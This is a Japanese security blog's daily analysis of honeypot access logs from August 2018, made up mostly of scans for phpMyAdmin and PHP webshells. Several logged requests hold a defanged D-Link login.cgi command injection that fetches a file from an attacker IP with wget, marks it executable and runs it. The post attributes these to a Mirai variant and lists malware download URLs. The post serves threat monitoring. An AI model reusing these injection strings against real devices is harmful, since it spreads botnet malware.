S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/16)

ハニーポットのログ分析(2018/08/16)

honeypot

WOWhoneypotの2018/08/16(木) (運用74日目)の簡易分析です。
本日の総アクセス件数は 158件です。以下が全アクセスログです。

25 2018-08-16 GET /
16 2018-08-16 GET /index.action
7 2018-08-16 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
4 2018-08-16 POST /qq.php
2 2018-08-16 POST /xx.php
2 2018-08-16 GET /phpMyAdmin/index.php
2 2018-08-16 GET hxxp://112.35.66.7:10083/index.php
1 2018-08-16 PROPFIND /
1 2018-08-16 POST /zuoshou.php
1 2018-08-16 POST /zuo.php
1 2018-08-16 POST /yumo.php
1 2018-08-16 POST /yao.php
1 2018-08-16 POST /xw.php
1 2018-08-16 POST /xw1.php
1 2018-08-16 POST /xshell.php
1 2018-08-16 POST /xiaomae.php
1 2018-08-16 POST /wuwu11.php
1 2018-08-16 POST /wshell.php
1 2018-08-16 POST /w.php
1 2018-08-16 POST /wp-admins.php
1 2018-08-16 POST /wc.php
1 2018-08-16 POST /test.php
1 2018-08-16 POST /ssaa.php
1 2018-08-16 POST /s.php
1 2018-08-16 POST /sheep.php
1 2018-08-16 POST /qwe.php
1 2018-08-16 POST /q.php
1 2018-08-16 POST /qaq.php
1 2018-08-16 POST /phpStudy.php
1 2018-08-16 POST /phpstudy.php
1 2018-08-16 POST /phpinfi.php
1 2018-08-16 POST /mx.php
1 2018-08-16 POST /m.php?pbid=open
1 2018-08-16 POST /min.php
1 2018-08-16 POST /lindex.php
1 2018-08-16 POST /l8.php
1 2018-08-16 POST /l7.php
1 2018-08-16 POST /h1.php
1 2018-08-16 POST /feixiang.php
1 2018-08-16 POST /fack.php
1 2018-08-16 POST /db_session.init.php
1 2018-08-16 POST /db.init.php
1 2018-08-16 POST /db__.init.php
1 2018-08-16 POST /db_desql.php
1 2018-08-16 POST /db_dataml.php
1 2018-08-16 POST /conflg.php
1 2018-08-16 POST /cmd.php
1 2018-08-16 POST /cainiao.php
1 2018-08-16 POST /bak.php
1 2018-08-16 POST /aotu.php
1 2018-08-16 POST /angge.php
1 2018-08-16 POST /ak48.php
1 2018-08-16 POST /ak47.php
1 2018-08-16 POST /9678.php
1 2018-08-16 POST /56.php
1 2018-08-16 POST /12.php
1 2018-08-16 POST /1213.php
1 2018-08-16 HEAD /
1 2018-08-16 GET /z.php
1 2018-08-16 GET /x.php
1 2018-08-16 GET /xampp/phpmyadmin/index.php
1 2018-08-16 GET /wp-config.php
1 2018-08-16 GET /web/phpMyAdmin/index.php
1 2018-08-16 GET /webdav/
1 2018-08-16 GET /uploader.php
1 2018-08-16 GET /test.php
1 2018-08-16 GET /sqladmin/scripts/setup.php
1 2018-08-16 GET /shell.php
1 2018-08-16 GET /setup.php
1 2018-08-16 GET /scripts/setup.php
1 2018-08-16 GET /pmd_online.php
1 2018-08-16 GET /pmd/index.php
1 2018-08-16 GET /pma/scripts/setup.php
1 2018-08-16 GET /pmamy2/index.php
1 2018-08-16 GET /PMA/index.php
1 2018-08-16 GET /PMA2/index.php
1 2018-08-16 GET /phpMyAdmin/scripts/setup.php
1 2018-08-16 GET /phpmyadmin/scripts/setup.php
1 2018-08-16 GET /phpmyadmin2/index.php
1 2018-08-16 GET /phpadmin/index.php
1 2018-08-16 GET /mysql/scripts/setup.php
1 2018-08-16 GET /mysqladmin/scripts/setup.php
1 2018-08-16 GET /MyAdmin/scripts/setup.php
1 2018-08-16 GET /myAdmin/scripts/setup.php
1 2018-08-16 GET /myadmin/scripts/setup.php
1 2018-08-16 GET /muhstik.php
1 2018-08-16 GET /muhstik-dpr.php
1 2018-08-16 GET /lol.php
1 2018-08-16 GET /log.php
1 2018-08-16 GET /logon.php
1 2018-08-16 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-16 GET /license.php
1 2018-08-16 GET /lala-dpr.php
1 2018-08-16 GET /knal.php
1 2018-08-16 GET /index.php
1 2018-08-16 GET HTTP/1.1
1 2018-08-16 GET /help-e.php
1 2018-08-16 GET /db/scripts/setup.php
1 2018-08-16 GET /db_cts.php
1 2018-08-16 GET /cmx.php
1 2018-08-16 GET /cmv.php
1 2018-08-16 GET /cmdd.php
1 2018-08-16 GET /appserv.php
1 2018-08-16 GET /admin/phpMyAdmin/index.php
1 2018-08-16 GET /admin/phpmyadmin/index.php
1 2018-08-16 GET /admin/phpmyadmin2/index.php
1 2018-08-16 GET /admin/mysql/index.php 

 

phpMyAdmin関連(30件)とphpのwebshellに対する調査(103件)と/を除外したアクセス数です。

16 2018-08-16 GET /index.action
7 2018-08-16 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
2 2018-08-16 GET hxxp://112.35.66[.]7:10083/index.php
1 2018-08-16 GET /webdav/
1 2018-08-16 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$

上から順に以下となります。

Apache Struts2脆弱性をついた攻撃。攻撃後のペイロードは以下。DDoS用のマルウェアを埋め込む攻撃。
 https://www.virustotal.com/#/file/37bb6f06b00906691d5d63cbc17828d152e25c8440a7b65e64120a5f43e70cbf/detection

・Mirai亜種 LMAO/2.0のD-Linkの脆弱性をついた攻撃。

・不正中継の調査

WebDAVの調査

・Mirai亜種 LMAO/2.0のD-Linkの脆弱性をついた攻撃。

 

 

本日のハンティングログは以下です。Mirai亜種2種とStruts脆弱性を突く攻撃です。

7 2018-08-16 wget hxxp://80.211.67[.]245/k
1 2018-08-16 wget hxxp://212.237.32[.]62/k 
1 2018-08-16 wget hxxp://gowel[.]top/l32

 

以上です。